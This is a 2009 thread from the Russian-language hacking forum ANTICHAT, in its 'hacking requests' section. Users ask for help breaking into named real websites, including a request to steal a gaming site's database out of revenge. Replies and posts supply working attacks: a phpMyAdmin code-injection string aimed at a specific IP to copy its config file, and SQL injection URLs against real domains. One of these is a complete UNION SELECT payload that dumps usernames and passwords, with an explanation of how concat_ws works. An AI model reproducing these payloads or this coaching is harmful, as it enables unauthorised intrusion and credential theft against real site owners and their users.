HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #361  
Старый 20.05.2009, 22:10
xJeWeL
Участник форума
Регистрация: 07.01.2008
Сообщений: 152
Провел на форуме:
315077

Репутация: 24
По умолчанию

понятно, тоесть дохлый номер.

а вот этот вариант
Стоит на сервере Vertrigo

http://83.167.125.144/cp/?module=character&action=online'

Стоит phpMyAdmin 2.11.7
http://83.167.125.144/phpmyadmin
Вроде можно сделать так и жизнь станет легче

/server_databases.php?pos=0&dbstats=0&sort_ by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

но я не пойму как она работает, и все равно выводит только запрос на Логин и Пасс.

Подскажите как правильно.

Последний раз редактировалось xJeWeL; 20.05.2009 в 22:13..
 

  #362  
Старый 29.05.2009, 15:21
malek16
Новичок
Регистрация: 14.05.2009
Сообщений: 13
Провел на форуме:
107398

Репутация: -12
По умолчанию

ОФФТОП ПРОСТИТЕ! помогите стырить бд http://www.syone.ru/ Причина: админ невыплатил все что выйграл! даже подовал в арбиртраж ,а они послали!
 

  #363  
Старый 30.05.2009, 22:01
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

1 www.syone.ru
2 clavesin.ru

от него clavesin.ru

могу тока пассивную ксс'ку дать на сайте с одного ИП +)
 

  #364  
Старый 05.06.2009, 23:24
ino222
Новичок
Регистрация: 01.06.2009
Сообщений: 24
Провел на форуме:
194387

Репутация: 6
Отправить сообщение для ino222 с помощью ICQ
По умолчанию

http://w1.dwar.ru/user_info.php?nick=%CB%E8%F1%EE%F2%E0#[injection] огромная просьба помочь, если вообще это реально
 

  #365  
Старый 08.06.2009, 15:26
uniis
Новичок
Регистрация: 02.08.2008
Сообщений: 8
Провел на форуме:
208141

Репутация: 0
По умолчанию

Подскажите чего дальше делать?
подобрал число полей

h__p://sait.ru/index.php?page_id=-1+u nion+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22

нашёл таблицу Users

h__p://sait.ru/index.php?page_id=1+un ion+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22+from+user s

пробую использовать INFORMATION_SCHEMA ни чего не получается отображается страница

h__p://sait.ru/index.php?page_id=-1+u nion+s elect+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+from+information schema.tables+limit+1,1

Последний раз редактировалось uniis; 14.07.2009 в 23:51..
 

  #366  
Старый 08.06.2009, 15:32
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://gpsautospb.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat_ws(0x3a,username,password),19,20,21, 22+from+users

вывод в заголовке (title)
 

  #367  
Старый 08.06.2009, 15:35
uniis
Новичок
Регистрация: 02.08.2008
Сообщений: 8
Провел на форуме:
208141

Репутация: 0
По умолчанию

спасибо! тока объясни я просто ещё до этого оператора не дошёл concat_ws что он делает?

Последний раз редактировалось uniis; 14.07.2009 в 23:39..
 

  #368  
Старый 08.06.2009, 15:41
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

uniis, concat_ws(0x3a,username,password)
оператор позволяет в одной переменной выводить несколько полей.
0x3a - это шестандцатиричное двоеточие (для удобства разделения переменных), две последующие.. это переменные, которые нужно конкатинировать (объеденить), через 0x3a

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat-ws
 

  #369  
Старый 28.06.2009, 17:11
Xack-Zero
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме:
611883

Репутация: 70
Отправить сообщение для Xack-Zero с помощью ICQ
По умолчанию

Попробуйте раскрутить
http://www.may-hosting.com/index.php?L=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30--
 

  #370  
Старый 27.07.2009, 23:12
darkkrad
Новичок
Регистрация: 14.07.2009
Сообщений: 4
Провел на форуме:
11163

Репутация: 0
По умолчанию

кто может помочь с инъекцией там сложновато все кто хорошо разбирается напишите в личку разговор долгий достаточно
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ